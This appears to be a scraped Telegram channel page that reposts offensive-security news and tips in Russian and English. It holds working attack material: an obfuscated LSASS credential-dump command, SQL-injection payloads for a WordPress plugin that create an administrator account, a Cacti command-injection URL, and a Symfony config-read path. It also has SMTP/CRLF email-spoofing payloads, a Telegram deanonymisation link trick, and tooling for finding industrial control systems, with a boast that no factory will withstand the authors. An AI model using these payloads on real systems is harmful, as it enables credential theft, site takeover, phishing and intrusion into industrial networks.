Pentester's Backlog
588 subscribers
309 photos
15 videos
44 files
424 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Ой, красота))) Получить данные из LSA без дампа LSASS.

Historically was able to (and may presently still) bypass:
* Windows Defender
* Malwarebytes Anti-Malware
* CrowdStrike Falcon EDR (Falcon Complete + OverWatch)


Tool: https://github.com/Meowmycks/LetMeowIn?tab=readme-ov-file

Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b

#redteam #pentest #creds #dump
Obfuscated LSASS dumper command

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;


😨 Подробнее, почему такое вообще возможно
2🥴1
Forwarded from RedTeam brazzers (Миша)
Иногда для реализации самых интересных векторов атак и осуществления умопомрачительных бизнес-целей требуется найти сегмент с АСУ ТП (привет пхд :) ). Есть несколько разных подходов:

- Можно пробовать обнаружить устройства с несколькими сетевыми интерфейсами. Ведь админ может взять и пробросить себе доступ куда не следует. Здесь, при отсутствии учетных данных, можно использовать NetBIOS , DNS, broadcast-igmp-discovery, IOXIDResolver . При наличии кредов от ДА можно обратить внимание на Powershell:
Invoke-Command -ComputerName $(Get-Content comps.txt) -ScriptBlock {ipconfig}


- Можно просто осуществлять поиск подсетей, извлекая их как с DC (Спасибо Димону Неверову) dsquery subnet , так и через рекурсивное хождение на машины: CornerShot , TrustMeter . Подобный функционал есть и в ldeep :
sudo ldeep ldap -u reguser -p 'Password123' -d domain.ltd -s ldap://192.168.0.147 subnets

Никто не запрещает и сдампить ADIDNS или обратиться к скриптам по типу tracebuster.py

- Помимо всего, иногда попадаются на глаза различные интересные службы — тот же SNMP. Или веб-админка какая-нибудь торчит. В таком случае на помощь придет httpx и aquatone
./httpx -l hosts.txt -silent -o res.txt [-http-proxy socks5://127.0.0.1:1337]
cat res.txt | ./aquatone [-proxy socks5://127.0.0.1:1337]


Тем не менее, основным мотивом поста стал инструмент Redpoint, нацеленный специально на АСУ ТП устройства. Репозиторий содержит в себе различные .nse скрипты для обнаружения подобных девайсов.

    BACnet-discover-enumerate.nse - Identify and enumerate BACnet devices

codesys-v2-discover.nse - Identify and enumerate CoDeSys V2 controllers

enip-enumerate.nse - Identify and enumerate EtherNet/IP devices from Rockwell Automation and other vendors

fox-info.nse - Identify and enumerate Niagara Fox devices

modicon-info.nse - Identify and enumerate Schneider Electric Modicon PLCs

omron-info.nse - Identify and enumerate Omron PLCs

pcworx-info.nse - Identify and enumerate PC Worx Protocol enabled PLCs

proconos-info.nse - Identify and enumerate ProConOS enabled PLCs

s7-enumerate.nse - Identify and enumerate Siemens SIMATIC S7 PLCs


В связи с чем, можно с уверенностью говорить, что не один завод не устоит перед нами))))

Главное не перетрудиться, чтобы не случилась ситуация из мема 😃
Forwarded from b␢code
✈️ В версии Telegram Desktop 4.16.6 добавили поддержку ссылок вида t.me/username?text=Hello для вставки заготовленного текста в поле ввода сообщения.

Нашел этому очень интересное применение, можно деанонить людей которые кликнули на ссылку. Вот пример ссылки. Если вы просто нажмете на него, мне придет уведомление что вы перешли

Так же сделал телеграм бота для создания таких ссылок: @inlinequery_bot
🐙 https://github.com/marwq/telegram-deanon
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Path Secure (CuriV)
Привет!

Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.

Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.

Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.

Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️

https://github.com/curiv/russian-offensive-security-questions

#pentest #interview #repository
👍1
Forwarded from 1N73LL1G3NC3
👩‍💻 PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9)

Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly.

Adding a new WordPress user:
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28


Giving the user admin rights:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c


PWNED!

Note: Param "integ" is the md5sum of the query.

6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22

Tweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Волосатый бублик
#adcs #bloodhound #ad

[ ADCS Attack Paths in BloodHound ]

This blog post(s) details the domain escalation requirements and explains how BloodHound incorporates the relevant components. SpectrOps team will demonstrate how to effectively use BloodHound to identify attack paths that involve ESC abuse.

Part 1


Part 2
👍1
Forwarded from Netlas.io
CVE-2023-49606: RCE in Tinyproxy 1.10.0, 1.11.1, 9.8 rating 🔥

A use-after-free vulnerability in Tinyproxy allows an attacker to perform RCE via a specially crafted HTTP header.

Search at Netlas.io:
👉 Link: https://nt.ls/vWqHD
👉 Dork: http.headers.server:"tinyproxy/1.11.1" OR http.headers.server:"tinyproxy/1.10.0"

Read more: https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889
💡 Если в ходе багбаунти/пентеста вы встретили веб-приложение на Symfony, проверьте наличие дебаг режима (/app_dev.php) и возможности чтения конфига: /app_dev.php/_profiler/open?file=app/config/parameters.yml

#tips #bugbounty #pentest
Forwarded from Proxy Bar
CVE-2024-29895 cacti
*
Command injection in cmd_realtime.php
*
fofa link
*
usage:
http://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1

#net
🥱2🥴1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-22120: Time Based SQL Injection in Zabbix Server Audit Log

Affected and fixed version/s:
* 6.0.0 - 6.0.27 / 6.0.28rc1
* 6.4.0 - 6.4.12 / 6.4.13rc1
* 7.0.0alpha1 - 7.0.0beta1 / 7.0.0beta2


Allows to dump any values from database. As an example of exploit above allows privilege escalation from user to admin. In some cases, SQL injection leads to RCE.


PoC: https://support.zabbix.com/secure/attachment/236280/236280_zabbix_server_time_based_blind_sqli.py

#exploit #pentest
Forwarded from Proxy Bar
CVE-2024-21683
Confluence Data Center and Server RCE
*
POC - 3 вариата

#Jirka
🎤 Кстати, на этой странице доступны все доклады с киберфестиваля 2024 Positive Hack Days. Если не присутствовали, то обязательно к просмотру!

👀 Смотреть
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from HaHacking
#заметки #offense

➡️Дополнительно разберёмся в кейсах, описанных в статье @slonser_notes, и в извлекаемом из них импакте!

   🧩   ‟Old new email attacks”   [ 🐍 / 💻 / 💻⚡️


📌 ГЛАВНЫЕ ПОИНТЫ

▪️Пробуйте общаться с почтовыми сервисами по SMTP:
Gmail:     smtp.gmail.com
Outlook: smtp-mail.outlook.com
Yandex: smtp.yandex.ru
Mail.Ru: smtp.mail.ru
...

SSL port: 465
TLS port: 587


▪️Пробуйте разные входные точки:
From: EMAIL
From: <EMAIL>
From: "NAME" <EMAIL>
From: <EMAIL> (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP: <EMAIL>
Sender: EMAIL


▪️Оказались уязвимы почтовые продукты Google, Microsoft, Yandex, ...

▪️Оказались уязвимы парсеры адресов электронных почт, библиотеки ЯП:
    ▪️Python   [email]
    ▪️JS   [addressparser, email-addresses]
    ▪️C#   [System.Net.Mail]
    ▪️Go   [net/mail]
    ▪️Rust, Ruby, PHP, ...


🔑 ПЕЙЛОАДЫ НА ПРОБУ

...➡️...
attacker@[testText\r\nRSET\r\nMAIL FROM: <spoofed@example.org>\r\nRCPT TO: <victim@example.org>\r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]

📧➡️📧
"Spoofed"
<attacker@outlook.com>: spoofed@outlook.com

📧➡️📧, 📧, ...
<spoofed@gmail.com> "spoofed" <attacker@gmail.com>

📧➡️📧, 📧
Attacker
<spoofed@gmail.com>:<attacker@gmail.com>

📧➡️...
": <attacker@gmail.com> "<spoofed@gmail.com>"



☠️  ИМПАКТ & ПОСЛЕДСТВИЯ

▪️Возможность внедрения конструкции CRLF (\r\n) для внедрения SMTP команд➡️Имперсонация, ...
▪️Некорректный парсинг адреса электронной почты отправителя➡️Имперсонация

❗️Имперсонация➡️(в данном случае) Подделка адреса электронной почты отправителя; Обеспечивает кратное повышение легитимности фишинговых писем в глазах атакуемых


💬 Поскольку вендоры считают перечисленные уязвимости фичами, возможность эксплуатации сохраняет актуальность и уже сейчас мы можем наблюдать, как, например, этими "фичами" начинают пользоваться хактивисты для проведения качественных фишинговых рассылок;


➡️Stay safe.

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Offensive Xwitter
😈 [ Aurélien Chalot @Defte_ ]

Wanna blindly check if the ADCS web enroll is installed on a domain ? Bruteforce the /certenroll endpoint without the trailing/ on all webservers. If you hit the ADCS web enroll you will get a location: /certenroll/ header in the response. Now enjoy blind ntlmrelayx ESC8 👀👀👀

Example. This webserver does not expose a ADCS web enroll endpoint but the Windows Admin Center panel. Yet your command will flag it as ADCS. While mine won't ;)

🐥 [ tweet ]